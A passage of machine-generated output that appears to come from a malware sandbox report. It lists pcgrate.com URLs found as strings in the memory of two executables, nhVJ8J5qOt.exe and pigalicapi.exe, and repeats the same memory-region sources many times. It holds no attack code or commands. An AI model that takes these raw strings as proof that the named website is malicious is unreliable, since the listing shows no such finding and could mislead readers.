00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com
                  Source: pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/
                  Source: pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#author
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#logo
                  Source: pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#organization
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#richSnippet
                  Source: pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#webpage
                  Source: pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#website
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/?s=
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/cart/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/checkout/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/comments/feed/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/feed/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-admin/admin-ajax.php
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1024px-Logo_Ball_Corporation.svg_-e1637155176306.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1200px-Zeiss_logosvg-e1626287816597.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1280px-Jet_Propulsio.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1920px-Raytheon.svg_-1-e1626285787717.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Huawei-Logowine-1.png
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/IIG_logo-5.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, 